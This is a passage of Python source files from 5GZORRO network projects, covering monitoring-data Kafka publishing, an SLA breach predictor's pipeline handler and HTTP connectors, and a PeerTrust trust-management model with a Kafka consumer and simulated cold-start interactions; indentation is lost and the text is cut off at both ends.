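For reference, a minimal client-side sketch of the lifecycle exposed above (create, fetch, disable, delete). The host/port, tenant id and payload values are hypothetical; the field names follow the Config_Model usage visible in the handlers, and the `id` field of the response is an assumption about Response_Config_Model.
```python
import requests

BASE = "http://localhost:8000"  # hypothetical deployment address of the MDA service

# Create a monitoring spec; concrete values must match the configured resource/step options
payload = {
    "tenant_id": "operator-a",
    "data_source_type": "prometheus",
    "metrics": [{"aggregation_method": "AVG", "step": "30s", "step_aggregation": "1m"}],
}
created = requests.post(f"{BASE}/settings", json=payload).json()
config_id = created.get("id")  # assumed response field

# Fetch, disable and finally delete the spec
print(requests.get(f"{BASE}/settings/{config_id}").json())
requests.put(f"{BASE}/settings/{config_id}/disable")
requests.delete(f"{BASE}/settings/{config_id}")
```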
#### File: mda/app/utils.py
```python
from .main import *
def info_log(status, message):
logging.critical('"status": "'+str(status)+'", "message": "'+message+'"')
def validate_uuid4(uuid_string):
try:
uuid.UUID(uuid_string).hex
except ValueError:
return False
return True
def send_kafka(data, dataHash, kafka_topic, producer):
try:
payload_encoded = {k: str(v).encode('utf-8') for k, v in dataHash.items()}
hashData = {k: hashlib.sha256(v).hexdigest() for k,v in payload_encoded.items()}
#info_log(None, f'Raw Data: {data} \nHashed Data: {hashData}')
# public and private keys
public_key = public_private_keys[data["operatorID"]]["public_key"]
private_key = public_private_keys[data["operatorID"]]["private_key"]
dataHashEncrypt = {rsa.encrypt(k.encode(), private_key): rsa.encrypt(v.encode(), private_key) for k,v in hashData.items()}
#info_log(None, f'Signup Data: {dataHashEncrypt}')
producer.send(kafka_topic, key=list(dataHashEncrypt.values())[0], value=data)
info_log(200, f'Post metric {data["monitoringData"]["metricName"]}, from operator {data["operatorID"]}, into DL Kafka Topic {kafka_topic} [Post Time: {data["monitoringData"]["timestamp"]}]')
return 1
except Exception as e:
info_log(400, 'Error in send_kafka: ' + str(e))
return 0
def queue_consumer(thread_identifier, queue, flag_agg, orchestrator, aggregator, producer):
try:
while True:
next_item = queue.get()
if next_item[3] == None or next_item[0] <= next_item[3]:
info_log(None, f'Start Fetching Values of Metric: {next_item[5]} (Thread Associated: {thread_identifier})')
if flag_agg == 1:
#Send aggregation
info_log(None, f'{datetime.datetime.now()} - UC1: Aggregating values from metric: {next_item[5]} (Step Aggregation Associated: {next_item[14]})')
aggregator.send_aggregation(next_item[5], next_item[12], next_item[0], next_item[11], next_item[8], next_item[10], next_item[9], next_item[7], next_item[4], next_item[14], next_item[13], next_item[15], next_item[16], producer)
update_aggregation(next_item[4], next_item[0])
else:
#Send metric
orchestrator.request_orchestrator(next_item[5], next_item[12], next_item[0], next_item[11], next_item[8], next_item[10], next_item[9], next_item[7], next_item[4], next_item[15], next_item[16], next_item[17], producer)
info_log(None, f'{datetime.datetime.now()} - UC2: Fetching values from OSM, metric: {next_item[5]} (Step Associated: {next_item[2]})')
update_next_run(next_item[4], next_item[0])
queue.task_done()
except Exception as e:
print(e)
def delete_old_metric(metric_id, queue):
index = True
while(index):
index = False
if queue == 0:
for i in range(len(orchestrator.metrics_queue.queue)):
if orchestrator.metrics_queue.queue[i][4] == metric_id:
#print('DELETE METRIC -> ' + str(datetime.datetime.now()) + ' -> ' + str(metric_id))
del orchestrator.metrics_queue.queue[i]
index = True
break
else:
for i in range(len(aggregator.aggregation_queue.queue)):
if aggregator.aggregation_queue.queue[i][4] == metric_id:
#print('DELETE AGG -> ' + str(datetime.datetime.now()) + ' -> ' + str(metric_id))
del aggregator.aggregation_queue.queue[i]
index = True
break
return
``` |
{
"source": "5GZORRO/sla-breach-predictor",
"score": 2
} |
#### File: isbp/exceptions/exceptions.py
```python
class AttributeListCannotBeEmptyException(Exception):
def __init__(self, reason = "The list of attributes for Multivariate LSTM cannot be empty."):
self.reason = reason
super().__init__(self.reason)
class WrongNumberOfAttributesException(Exception):
def __init__(self, n_features, list_size):
self.reason = 'Expected number of attributes is ' + str(n_features) + ' but ' + str(list_size) + ' were given.'
super().__init__(self.reason)
class PathNotFoundException(Exception):
def __init__(self, path: str):
self.reason = "Path '"+path+"' was not found."
super().__init__(self.reason)
class OperationNotRegisteredException(Exception):
def __init__(self, operation_id: str):
self.reason = "Operation '"+operation_id+"' was not found in the registry."
super().__init__(self.reason)
class MetricNotFoundException(Exception):
def __init__(self, metric: str):
self.reason = "Metric '"+metric+"' was not found in the data."
super().__init__(self.reason)
```
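A short usage sketch for these exception types, assuming the file is importable as `isbp.exceptions.exceptions`; the checking function and its values are hypothetical.
```python
from isbp.exceptions.exceptions import WrongNumberOfAttributesException

def check_features(expected: int, received: list):
    # Raise the domain-specific exception when the feature count does not match
    if len(received) != expected:
        raise WrongNumberOfAttributesException(expected, len(received))

try:
    check_features(3, ["latency", "throughput"])
except WrongNumberOfAttributesException as exc:
    print(exc.reason)  # Expected number of attributes is 3 but 2 were given.
```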
#### File: isbp/runtime/handler.py
```python
from runtime.active_pipeline import ActivePipeline
from runtime.http_connectors import register_pipeline, get_sla_details
import json
import logging
log = logging.getLogger(__name__)
class Handler():
scaler = None
__active_ops = None
__count = 0
def init():
global __active_ops
global __count
__active_ops = {}
__count = 0
def get_list():
global __active_ops
return __active_ops
def create_new_pipeline(data):
global __active_ops
global __count
slaID = data.get('slaID')
pipeline = __active_ops.get(slaID)
if pipeline is not None:
log.info('Pipeline already exists')
status = 'Pipeline already exists'
else:
try:
sla_details, status = get_sla_details(slaID)
if sla_details is not None:
rule = sla_details.get('rule')[0]
threshold = rule.get('referenceValue')
operator = rule.get('operator')
metric_name = rule.get('metric')
pipeline = ActivePipeline(slaID, threshold, metric_name, operator)
__active_ops[pipeline.slaID] = pipeline
__count = __count + 1
log.info('Created new pipeline with ID: {0}'.format(pipeline.slaID))
register_pipeline(pipeline.slaID)
except Exception as e:
status = str(e)
return pipeline, status
def get_active_pipeline(_id):
global __active_ops
pipeline = __active_ops.get(_id)
return pipeline
def terminate_pipeline(pipeline_id):
global __active_ops
global __count
result = None
status_code = 0
pipeline = __active_ops.get(pipeline_id)
if pipeline is None:
result = 'Pipeline not found.'
status_code = 404
else:
del __active_ops[pipeline_id]
__count = __count - 1
result = 'Pipeline successfully terminated.'
status_code = 200
return result, status_code
def set_prediction(data):
global __active_ops
pipeline_id = data.get('slaID')
prediction = float(data.get('value'))
timestamp = data.get('datetimeViolation')
pipeline = Handler.get_active_pipeline(pipeline_id)
if pipeline is not None:
pipeline.prediction_for_accuracy = prediction
pipeline.prediction_date = timestamp
result = 'Successfully set prediction for ' + pipeline_id
#prediction = Handler.transform(prediction)
else:
result = 'Pipeline not found.'
return result, pipeline, prediction
def get_active_list():
global __active_ops
global __count
result = None
# Initialize an empty dict of active pipelines
active_list = {}
if __count < 1:
result = 'No active pipelines.'
else:
for entry in __active_ops:
pipeline = __active_ops.get(entry)
json_object = {'id' : pipeline.slaID,
'name' : pipeline.name,
'description' : pipeline.description,
}
active_list[pipeline.productID] = json_object
result = json.dumps(active_list)
return result
def get_pipeline(pipeline_id):
global __active_ops
pipeline = __active_ops.get(pipeline_id)
result = None
status_code = 0
if pipeline is not None:
result = {}
result['id'] = pipeline.slaID
result['name'] = pipeline.name
result['description'] = pipeline.description
result = json.dumps(result)
status_code = 200
else:
result = "Pipeline "+"'"+str(pipeline_id)+"' "+"does not exist."
status_code = 404
return result, status_code
```
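A minimal sketch of how the Handler registry above might be driven, assuming the module is importable as `runtime.handler` (matching the import style used in this repo) and that the SLA details service contacted by get_sla_details is reachable; all identifiers and values below are hypothetical.
```python
from runtime.handler import Handler

Handler.init()  # initialise the module-level registry and counter

# Creating a pipeline requires the SLA manager endpoint to be reachable
pipeline, status = Handler.create_new_pipeline({"slaID": "sla-0001"})
print(status)

# Feed a prediction back into an existing pipeline
result, pipeline, prediction = Handler.set_prediction(
    {"slaID": "sla-0001", "value": "0.92", "datetimeViolation": "2022-01-01T00:00:00Z"}
)

# Inspect and tear down
print(Handler.get_pipeline("sla-0001"))
print(Handler.terminate_pipeline("sla-0001"))
```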
#### File: isbp/runtime/http_connectors.py
```python
from config.config import Config as cnf
import requests
import json
import logging
params = {'userId' : 'isbp', 'authToken' : '<PASSWORD>'}
def register_app():
global params
register_url = 'http://172.28.3.94:8080/datalake/v1/user'
request = requests.post(register_url, json = params)
if request.status_code == 409:
logging.info('App already registered. Getting information.')
request = requests.get(register_url, json = params)
response = json.loads(request.text)
data_topic = response.get('availableResources').get('topics').get('userInTopic')
kafka_url = response.get('availableResources').get('urls').get('kafka_url').split(':')
cnf.TOPICS.append(data_topic)
cnf.KAFKA_HOST = kafka_url[0]
cnf.KAFKA_PORT = kafka_url[1]
cnf.MON_DATA_TOPIC = data_topic
def register_pipeline(slaID):
global params
register_url = 'http://172.28.3.46:30887/datalake/v1/stream_data/register/'+slaID
token = {'userInfo' : params, 'productInfo' : {'topic' : cnf.MON_DATA_TOPIC}}
request = requests.post(register_url, json = token)
if request.status_code > 200 and request.status_code < 300:
logging.info("Successfully registered pipeline with ID: {0}".format(slaID))
else:
logging.info("Registration failed.")
def get_sla_details(slaID):
sla_url = 'http://172.28.3.6:31080/smart-contract-lifecycle-manager/api/v1/service-level-agreement/'
response = None
request = requests.get(sla_url+slaID)
logging.info('SLA status: {0}'.format(request.status_code))
if request.status_code == 200:
response = json.loads(request.text)
result = 'SLA details successfully retrieved'
else:
result = 'SLA not found or could not be retrieved'
return response, result
``` |
{
"source": "5GZORRO/Trust-management-framework",
"score": 3
} |
#### File: Trust-management-framework/peer_Trust_Model/consumer.py
```python
from kafka import KafkaConsumer
import json
import logging
import time
class Consumer():
consumer = None
name_server = 'kafka:9093'
def start(self):
""" This method initialises a KafkaConsumer reading messages from the beginning """
global consumer
self.consumer = KafkaConsumer(bootstrap_servers=self.name_server, group_id=None, auto_offset_reset='earliest')
#self.consumer = KafkaConsumer(topic, bootstrap_servers=self.name_server, group_id=None,
#enable_auto_commit=False, auto_offset_reset='earliest')
return self.consumer
def subscribe(self, topics):
"""" This method subscribes the 5G-TRMF to a set of interesting topics. The topics parameter must be a list """
global consumer
try:
self.consumer.subscribe(topics)
return 1
except Exception as e:
return 0
def stop(self):
""" This method finishes a KafkaConsumer connection as well as unsubscribing the topics registered """
global consumer
self.consumer.unsubscribe()
self.consumer.close()
def start_reading(self, data_lock, historical):
""" This method begins to retrieve messages from a KafkaTopic.
IT MUST BE LAUNCHED AS A THREAD TO AVOID BLOCKING THE APP """
logging.basicConfig(level=logging.INFO)
global consumer
for message in self.consumer:
trust_information = json.loads(message.value.decode())
data_lock.acquire()
if trust_information["trustor"]["trustorDID"] in historical:
historical[trust_information["trustor"]["trustorDID"]].append(trust_information)
else:
historical[trust_information["trustor"]["trustorDID"]] = [trust_information]
data_lock.release()
logging.info("New message: %s", trust_information)
def readSLANotification(self, historical, trustor, trustee, offerDID):
""" This function retrieves all notifications of potential SLA violations generated by the SLA Breach Predictor.
Currently, we are simulating that the TMF is subscribed to the real SLA Breach Predictor Kafka topic.
TODO -> Verify which trustor (5GZORRO Participant) the notification is associated with as the Trust Framework may be
managing the trust of more than one at the same time. if message.key.decode('utf-8') =="""
global consumer
notifications = []
for message in self.consumer:
sla_information = json.loads(message.value.decode())
notifications.append(sla_information)
return notifications
def readLastTrustValues(self, historical, trustor, trustee, last_interaction, current_interation_number):
""" This method is utilised to retrieve all new trust information generated by a particular trustee on which we want
to update our previous trust score. This method only retrieves new inputs """
values = []
""" Starting from the end to discover new trust information faster """
for interactions in reversed(historical):
interation_number = interactions["currentInteractionNumber"]
""" Looking for all new interactions not previously contemplated"""
if interactions["trustor"]["trustorDID"] == trustor and \
interactions["trustor"]["trusteeDID"] == trustee and \
int(interation_number) > int(last_interaction) and \
int(interation_number) == int(current_interation_number):
data = {"trustorDID": interactions["trustor"]["trustorDID"],
"trusteeDID": interactions["trustor"]["trusteeDID"],
"offerDID": interactions["trustor"]["offerDID"],
"trusteeSatisfaction": interactions["trustee"]["trusteeSatisfaction"],
"credibility": interactions["trustor"]["credibility"],
"transactionFactor": interactions["trustor"]["transactionFactor"],
"communityFactor": interactions["trustor"]["communityFactor"],
"interaction_number": interactions["trustor"]["direct_parameters"]["interactionNumber"],
"totalInteractionNumber": interactions["trustor"]["direct_parameters"]["totalInteractionNumber"],
"userSatisfaction": interactions["trustor"]["direct_parameters"]["userSatisfaction"],
"trust_value": interactions["trust_value"],
"initEvaluationPeriod": interactions["initEvaluationPeriod"],
"endEvaluationPeriod": interactions["endEvaluationPeriod"]
}
values.append(data)
return values
def readLastTrustInterationValues(self, historical, trustor, trustee, offer, current_interation_number):
""" This method is utilised to retrieve all new trust information generated by a particular trustee on the current
interaction number X """
data = {}
for interactions in reversed(historical):
if interactions["trustor"]["trustorDID"] == trustor and \
interactions["trustor"]["trusteeDID"] == trustee and \
interactions["trustor"]["offerDID"] == offer and \
current_interation_number > 0:
interation_number = interactions["trustor"]["direct_parameters"]["interactionNumber"]
""" Checking whether the current interaction is the one we are looking for"""
if interation_number == current_interation_number-1:
data = {"trustorDID": interactions["trustor"]["trustorDID"],
"trusteeDID": interactions["trustor"]["trusteeDID"],
"offerDID": interactions["trustor"]["offerDID"],
"trusteeSatisfaction": interactions["trustee"]["trusteeSatisfaction"],
"credibility": interactions["trustor"]["credibility"],
"transactionFactor": interactions["trustor"]["transactionFactor"],
"communityFactor": interactions["trustor"]["communityFactor"],
"interaction_number": interactions["trustor"]["direct_parameters"]["interactionNumber"],
"totalInteractionNumber": interactions["trustor"]["direct_parameters"]["totalInteractionNumber"],
"userSatisfaction": interactions["trustor"]["direct_parameters"]["userSatisfaction"],
"trust_value": interactions["trust_value"],
"initEvaluationPeriod": interactions["initEvaluationPeriod"],
"endEvaluationPeriod": interactions["endEvaluationPeriod"]
}
return data
return data
def readLastTrustValue(self, historical, trustor, trustee):
""" This method obtains the last trust value recorded in the historical for a specific a trustor, and trustee.
Only specific information is returned """
data = {}
for interactions in reversed(historical):
if interactions["trustor"]["trustorDID"] == trustor and \
interactions["trustor"]["trusteeDID"] == trustee:
data = {"trustorDID": interactions["trustor"]["trustorDID"],
"trusteeDID": interactions["trustor"]["trusteeDID"],
"offerDID": interactions["trustor"]["offerDID"],
"trusteeSatisfaction": interactions["trustee"]["trusteeSatisfaction"],
"credibility": interactions["trustor"]["credibility"],
"transactionFactor": interactions["trustor"]["transactionFactor"],
"communityFactor": interactions["trustor"]["communityFactor"],
"interaction_number": interactions["trustor"]["direct_parameters"]["interactionNumber"],
"totalInteractionNumber": interactions["trustor"]["direct_parameters"]["totalInteractionNumber"],
"userSatisfaction": interactions["trustor"]["direct_parameters"]["userSatisfaction"],
"trust_value": interactions["trust_value"],
"initEvaluationPeriod": interactions["initEvaluationPeriod"],
"endEvaluationPeriod": interactions["endEvaluationPeriod"]
}
return data
return data
def readLastTrustValueOffer(self, historical, trustor, trustee, offer):
""" This method obtains the last trust value recorded in the historical for a specific a trustor, trustee and offer.
Only specific information is returned """
data = {}
for interactions in reversed(historical):
if interactions["trustor"]["trustorDID"] == trustor and \
interactions["trustor"]["trusteeDID"] == trustee and \
interactions["trustor"]["offerDID"] == offer:
data = {"trustorDID": interactions["trustor"]["trustorDID"],
"trusteeDID": interactions["trustor"]["trusteeDID"],
"offerDID": interactions["trustor"]["offerDID"],
"trusteeSatisfaction": interactions["trustee"]["trusteeSatisfaction"],
"credibility": interactions["trustor"]["credibility"],
"transactionFactor": interactions["trustor"]["transactionFactor"],
"communityFactor": interactions["trustor"]["communityFactor"],
"interaction_number": interactions["trustor"]["direct_parameters"]["interactionNumber"],
"totalInteractionNumber": interactions["trustor"]["direct_parameters"]["totalInteractionNumber"],
"userSatisfaction": interactions["trustor"]["direct_parameters"]["userSatisfaction"],
"trust_value": interactions["trust_value"],
"initEvaluationPeriod": interactions["initEvaluationPeriod"],
"endEvaluationPeriod": interactions["endEvaluationPeriod"]
}
return data
return data
def readAllInformationTrustValue(self, historical, trustor, trustee, offer):
""" This method obtains the last trust value recorded in Kafka for a specific a trustor, trustee and offer. All
previously recorded trust information is returned """
data = {}
for interactions in reversed(historical):
if interactions["trustor"]["trustorDID"] == trustor and \
interactions["trustor"]["trusteeDID"] == trustee and \
interactions["trustor"]["offerDID"] == offer:
data = {"trustorDID": interactions["trustor"]["trustorDID"],
"trusteeDID": interactions["trustor"]["trusteeDID"],
"offerDID": interactions["trustor"]["offerDID"],
"trusteeSatisfaction": interactions["trustee"]["trusteeSatisfaction"],
"credibility": interactions["trustor"]["credibility"],
"transactionFactor": interactions["trustor"]["transactionFactor"],
"communityFactor": interactions["trustor"]["communityFactor"],
"interaction_number": interactions["trustor"]["direct_parameters"]["interactionNumber"],
"totalInteractionNumber": interactions["trustor"]["direct_parameters"]["totalInteractionNumber"],
"userSatisfaction": interactions["trustor"]["direct_parameters"]["userSatisfaction"],
"trust_value": interactions["trust_value"],
"initEvaluationPeriod": interactions["initEvaluationPeriod"],
"endEvaluationPeriod": interactions["endEvaluationPeriod"]
}
return data
return data
def readTrusteeInteractions(self, historical, trustee):
""" This function counts all interactions with a particular trustee in the historical"""
counter = 0
for interactions in reversed(historical):
if interactions["trustor"]["trusteeDID"] == trustee:
counter += 1
return counter
def readOfferTrusteeInteractions(self, historical, trustee, offerTrusteDIDs):
""" This function counts all interactions with a particular offer in the historical """
counter = 0
for interactions in reversed(historical):
if interactions["trustor"]["trusteeDID"] == trustee and \
interactions["trustor"]["offerDID"] == offerTrusteDIDs:
counter += 1
return counter
def readSatisfactionSummation(self, historical, trustor, trustee):
""" This method returns the average satisfaction rate between a trustor and a trustee """
counter = 0
satisfactionsummation = 0.0
for interactions in reversed(historical):
if interactions["trustor"]["trustorDID"] == trustor and \
interactions["trustor"]["trusteeDID"] == trustee:
counter += 1
satisfactionsummation = satisfactionsummation + interactions["trustor"]["direct_parameters"]["userSatisfaction"]
""" Guard against the case where no interactions with this trustee have been recorded yet """
if counter == 0:
return 0.0
return round(satisfactionsummation/counter, 3)
```
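A minimal wiring sketch for the consumer above: the broker address comes from the class defaults, the shared dict and lock mirror the start_reading signature, and the topic name is hypothetical.
```python
from threading import Lock, Thread
from consumer import Consumer

historical = {}   # trustorDID -> list of trust information messages
data_lock = Lock()

consumer = Consumer()
consumer.start()                      # connects to kafka:9093
consumer.subscribe(["trust-topic"])   # hypothetical topic name

# Consume in the background so the main application is not blocked
Thread(target=consumer.start_reading, args=(data_lock, historical), daemon=True).start()
```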
#### File: Trust-management-framework/peer_Trust_Model/peerTrust.py
```python
import json
import sys
import logging
import random
import time
import ast
import math
import os.path
import csv
import rstr
import copy
#from producer import *
from trustInformationTemplate import *
from consumer import *
from datetime import datetime
from random import randint
from multiprocessing import Process, Value, Manager
from threading import Lock
#logging.basicConfig(level=logging.INFO)
""" This file contains all methods necessary to obtain the minimum information required by the peerTrust model """
class PeerTrust():
dlt_file_name = 'DLT.csv'
dlt_headers = ["trustorDID","trusteeDID", "offerDID", "userSatisfaction", "interactionNumber",
"totalInteractionNumber", "currentInteractionNumber"]
""" Creating additional domains to generate previous interactions and avoid a cold start """
list_additional_did_providers = []
list_additional_did_offers = []
""" Parameters to define a minimum interactions in the system and avoid a cold start"""
max_previous_providers_DLT = 4
max_previous_providers_interactions_DLT = 3
max_previous_interactions_DLT = max_previous_providers_DLT * max_previous_providers_interactions_DLT
max_different_interactions = max_previous_providers_DLT * 2
historical = []
consumer = None
def find_by_column(self, filename, column, value):
""" This method discovers interactions registered in the DLT looking at one specific value"""
list_object = []
with open(filename) as f:
reader = csv.DictReader(f)
for item in reader:
if item[column] == value:
list_object.append(item)
return list(list_object)
def find_by_two_column(self, filename, column1, value1, colum2, value2):
""" This method discovers interactions registered in the DLT looking at two specific values"""
list_object = []
with open(filename) as f:
reader = csv.DictReader(f)
for item in reader:
if item[column1] == value1 and item[colum2] == value2:
list_object.append(item)
return list(list_object)
def minimumTrustTemplate(self, trustorDID, trusteeDID, offerDID):
""" This method initialises a set of minimum trust parameters to ensure that the system does not start from
scratch as well as defining a common trust template which will then be updated """
trustInformationTemplate = TrustInformationTemplate()
information = trustInformationTemplate.trustTemplate()
""" Adding information related to the specific request """
information["trustee"]["trusteeDID"] = trusteeDID
information["trustee"]["offerDID"] = offerDID
#information["trustee"]["trusteeSatisfaction"] = self.getTrusteeSatisfactionDLT(trusteeDID)
information["trustee"]["trusteeSatisfaction"] = round(random.uniform(0.8, 0.95),3)
information["trustor"]["trustorDID"] = trustorDID
information["trustor"]["trusteeDID"] = trusteeDID
information["trustor"]["offerDID"] = offerDID
information["trustor"]["credibility"] = round(random.uniform(0.75, 0.9),3)
information["trustor"]["transactionFactor"] = round(random.uniform(0.8, 0.9),3)
information["trustor"]["communityFactor"] = round(random.uniform(0.85, 0.9),3)
information["trustor"]["direct_parameters"]["userSatisfaction"] = round(random.uniform(0.75, 0.9),3)
direct_weighting = round(random.uniform(0.6, 0.7),2)
information["trustor"]["direct_parameters"]["direct_weighting"] = direct_weighting
information["trustor"]["indirect_parameters"]["recommendation_weighting"] = 1-direct_weighting
information["trustor"]["direct_parameters"]["interactionNumber"] = self.getInteractionNumber(trustorDID, trusteeDID)
information["trustor"]["direct_parameters"]["totalInteractionNumber"] = self.getLastTotalInteractionNumber(trusteeDID)
information["trust_value"] = round(information["trustor"]["direct_parameters"]["direct_weighting"]*(information["trustee"]["trusteeSatisfaction"]*information["trustor"]["credibility"]*information["trustor"]["transactionFactor"])+information["trustor"]["indirect_parameters"]["recommendation_weighting"]*information["trustor"]["communityFactor"],3)
information["currentInteractionNumber"] = self.getCurrentInteractionNumber(trustorDID)
information["initEvaluationPeriod"] = datetime.timestamp(datetime.now())-1000
information["endEvaluationPeriod"] = datetime.timestamp(datetime.now())
return information
def minimumTrustValuesDLT(self, producer, trustor, dict_product_offers):
""" This method establishes multiple trust relationships from list of product offers to start the trust
model with a set of minimum relationships. In addition, it also simulates the registration of such interactions
in the DLT """
print("\n\nSet of previous trust interactions between 5GZORRO domains\n")
data = []
""" 4 extra domains are currently considered"""
for i in range(4):
self.list_additional_did_providers.append(rstr.xeger("[a-z0-9]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12}"))
additional_did_offers = []
additional_did_offers.append(rstr.xeger("[a-z0-9]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12}"))
additional_did_offers.append(rstr.xeger("[a-z0-9]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12}"))
self.list_additional_did_offers.append(additional_did_offers)
aux_did_providers = self.list_additional_did_providers[:]
aux_did_offers = copy.deepcopy(self.list_additional_did_offers)
""" Generating two interactions per provider, one per each offer"""
counter = 0
for i in range(self.max_previous_providers_DLT):
providers = list(range(0,self.max_previous_providers_DLT))
providers.remove(i)
current_additional_provider = random.choice(providers)
current_additional_offer = randint(0,1)
for j in range (self.max_previous_providers_interactions_DLT):
interaction = False
new_trustee = None
new_offer = None
while (interaction == False):
if "$" not in aux_did_providers[current_additional_provider] and \
self.list_additional_did_providers[i] != aux_did_providers[current_additional_provider]:
if "$" not in aux_did_offers[current_additional_provider][current_additional_offer]:
new_trustee = aux_did_providers[current_additional_provider]
new_offer = aux_did_offers[current_additional_provider][current_additional_offer]
counter+=1
interaction = True
aux_did_offers[current_additional_provider][current_additional_offer] = \
aux_did_offers[current_additional_provider][current_additional_offer] + "$"
else:
current_additional_offer = (current_additional_offer+1)\
%len(aux_did_offers[current_additional_provider])
if "$" not in aux_did_offers[current_additional_provider][current_additional_offer] and \
self.list_additional_did_providers[i] != aux_did_providers[current_additional_provider]:
new_trustee = aux_did_providers[current_additional_provider]
new_offer = aux_did_offers[current_additional_provider][current_additional_offer]
counter+=1
interaction = True
aux_did_offers[current_additional_provider][current_additional_offer] = \
aux_did_offers[current_additional_provider][current_additional_offer] + "$"
else:
aux_did_providers[current_additional_provider] = \
aux_did_providers[current_additional_provider] + "$"
current_additional_provider = (current_additional_provider+1)%len(aux_did_providers)
else:
current_additional_provider = (current_additional_provider+1)%len(aux_did_providers)
if counter >= self.max_different_interactions-1 and \
self.list_additional_did_providers[i] != self.list_additional_did_providers[current_additional_provider]:
new_trustee = aux_did_providers[current_additional_provider]
new_offer = aux_did_offers[current_additional_provider][current_additional_offer]
if "$" in new_trustee:
new_trustee = self.list_additional_did_providers[current_additional_provider]
else:
aux_did_providers[current_additional_provider] = aux_did_providers[current_additional_provider] + "$"
if "$" in new_offer:
new_offer = self.list_additional_did_offers[current_additional_provider][current_additional_offer]
else:
aux_did_offers[current_additional_provider][current_additional_offer] = \
aux_did_offers[current_additional_provider][current_additional_offer] + "$"
counter+=1
interaction = True
new_interaction = {"trustorDID": self.list_additional_did_providers[i], "trusteeDID": new_trustee,
"offerDID": new_offer, "userSatisfaction": round(random.uniform(0.80, 0.99), 3),
"interactionNumber": 1, "totalInteractionNumber": 6, "currentInteractionNumber": 8}
""" Adjusting the parameters based on previous interactions """
for interaction in data:
if interaction["trustorDID"] == new_interaction["trustorDID"]:
new_interaction["currentInteractionNumber"] = interaction["currentInteractionNumber"] + 1
if interaction["trustorDID"] == new_interaction["trustorDID"] and interaction["trusteeDID"] == new_interaction["trusteeDID"] and interaction["offerDID"] == new_interaction["offerDID"]:
new_interaction["interactionNumber"] == interaction["interactionNumber"] + 1
if interaction["trustorDID"] == new_interaction["trusteeDID"]:
new_interaction["currentInteractionNumber"] = interaction["totalInteractionNumber"] + 1
if interaction["trusteeDID"] == new_interaction["trustorDID"]:
new_interaction["totalInteractionNumber"] = interaction["currentInteractionNumber"]
if interaction["trusteeDID"] == new_interaction["trusteeDID"]:
new_interaction["totalInteractionNumber"] = interaction["totalInteractionNumber"]
data.append(new_interaction)
""" Adding new interactions with respect to the product offers sent by the SRSD request"""
aux_new_interactions = []
trustor_acquired = False
for trustee in dict_product_offers:
""" Ignore the first item related to the trustor DID """
if trustor_acquired == False:
next(iter(dict_product_offers.values()))
trustor_acquired = True
else:
for offer in dict_product_offers[trustee]:
new_interaction = {"trustorDID": "did:5gzorro:domain-Z", "trusteeDID": trustee, "offerDID": offer,
"userSatisfaction": round(random.uniform(0.80, 0.99), 3), "interactionNumber": 1, "totalInteractionNumber": 6, "currentInteractionNumber": 8}
aux_new_interactions.append(new_interaction)
""" Adjusting the parameters based on previous interactions"""
for i in range(len(aux_new_interactions)):
index = i%len(self.list_additional_did_providers)
aux_new_interactions[i]["trustorDID"] = self.list_additional_did_providers[index]
for interaction in data:
if interaction["trustorDID"] == aux_new_interactions[i]["trustorDID"]:
aux_new_interactions[i]["currentInteractionNumber"] = interaction["currentInteractionNumber"] + 1
if interaction["trustorDID"] == aux_new_interactions[i]["trustorDID"] and interaction["trusteeDID"] == aux_new_interactions[i]["trusteeDID"] and interaction["offerDID"] == aux_new_interactions[i]["offerDID"]:
aux_new_interactions[i]["interactionNumber"] == interaction["interactionNumber"] + 1
if interaction["trustorDID"] == aux_new_interactions[i]["trusteeDID"]:
aux_new_interactions[i]["currentInteractionNumber"] = interaction["totalInteractionNumber"] + 1
if interaction["trusteeDID"] == aux_new_interactions[i]["trustorDID"]:
aux_new_interactions[i]["totalInteractionNumber"] = interaction["currentInteractionNumber"]
if interaction["trusteeDID"] == aux_new_interactions[i]["trusteeDID"]:
aux_new_interactions[i]["totalInteractionNumber"] = interaction["totalInteractionNumber"]
data.append(aux_new_interactions[i])
print(data, "\n")
interactions = []
"If DLT.csv file doesn't exist, we add new interactions related to the POs and minimum interactions between providers"
if not os.path.exists(self.dlt_file_name):
if not os.path.exists(self.dlt_file_name):
with open(self.dlt_file_name, 'w', encoding='UTF8', newline='') as dlt_data:
writer = csv.DictWriter(dlt_data, fieldnames=self.dlt_headers)
writer.writeheader()
for interaction in data:
trust_informartion = self.minimumTrustTemplate(interaction["trustorDID"], interaction["trusteeDID"], interaction["offerDID"])
trust_informartion["trustor"]["direct_parameters"]["userSatisfaction"] = interaction["userSatisfaction"]
trust_informartion["trustor"]["direct_parameters"]["interactionNumber"] = interaction["interactionNumber"]
trust_informartion["trustor"]["direct_parameters"]["totalInteractionNumber"] = interaction["totalInteractionNumber"]
trust_informartion["currentInteractionNumber"] = interaction["currentInteractionNumber"]
""" The minimum interactions are also registered in the Trustor's historical but
they must be deleted when cold start is not used """
interactions.append(trust_informartion)
for i in interactions:
self.historical.append(i)
return data
else:
"We only add new interactions related to the POs"
for interaction in aux_new_interactions:
trust_informartion = self.minimumTrustTemplate(interaction["trustorDID"], interaction["trusteeDID"], interaction["offerDID"])
trust_informartion["trustor"]["direct_parameters"]["userSatisfaction"] = interaction["userSatisfaction"]
trust_informartion["trustor"]["direct_parameters"]["interactionNumber"] = interaction["interactionNumber"]
trust_informartion["trustor"]["direct_parameters"]["totalInteractionNumber"] = interaction["totalInteractionNumber"]
trust_informartion["currentInteractionNumber"] = interaction["currentInteractionNumber"]
""" The minimum interactions are also registered in the Trustor's historical but
they must be deleted when cold start is not used """
interactions.append(trust_informartion)
for i in interactions:
self.historical.append(i)
return aux_new_interactions
#return data
def stringToDictionaryList(self):
"""Convert string to a list of dictionaries"""
new_interaction_list = []
with open('DLT.json', 'r') as file:
file.seek(0)
interaction_list = file.read()
interaction_list = interaction_list.split("\\n")
for interaction in interaction_list:
interaction = interaction.replace("\\\"","\"")
interaction = interaction.replace("\"{", "{")
interaction = interaction.replace("}\"", "}")
new_interaction_list.append(ast.literal_eval(interaction))
file.close()
return new_interaction_list
def getLastTotalInteractionNumber(self, trusteeDID):
""" Retrieve the last interactions number registered in the DLT for a Trustee"""
last_total_iteraction_number = 1
with open(self.dlt_file_name) as f:
reader = csv.DictReader(f)
for item in reader:
if item["trustorDID"] == trusteeDID and int(item["currentInteractionNumber"]) > last_total_iteraction_number:
